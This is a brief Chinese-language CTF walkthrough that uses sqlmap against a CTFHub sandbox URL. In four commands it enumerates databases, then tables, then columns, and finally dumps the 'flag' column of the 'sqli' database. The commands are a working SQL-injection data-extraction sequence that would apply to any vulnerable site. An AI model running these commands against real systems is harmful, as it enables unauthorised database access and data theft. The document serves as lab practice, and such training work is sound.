使用 SQLMap 自动化注入

查询数据库信息

sqlmap -u "http://challenge-c2f7aff72f21ec2a.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 --dbs

查询数据库中的表

sqlmap -u "http://challenge-c2f7aff72f21ec2a.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli --tables

查询表结构

sqlmap -u "http://challenge-c2f7aff72f21ec2a.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli -T flag --columns

查询表里的记录

sqlmap -u "http://challenge-c2f7aff72f21ec2a.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli -T flag -C flag --dump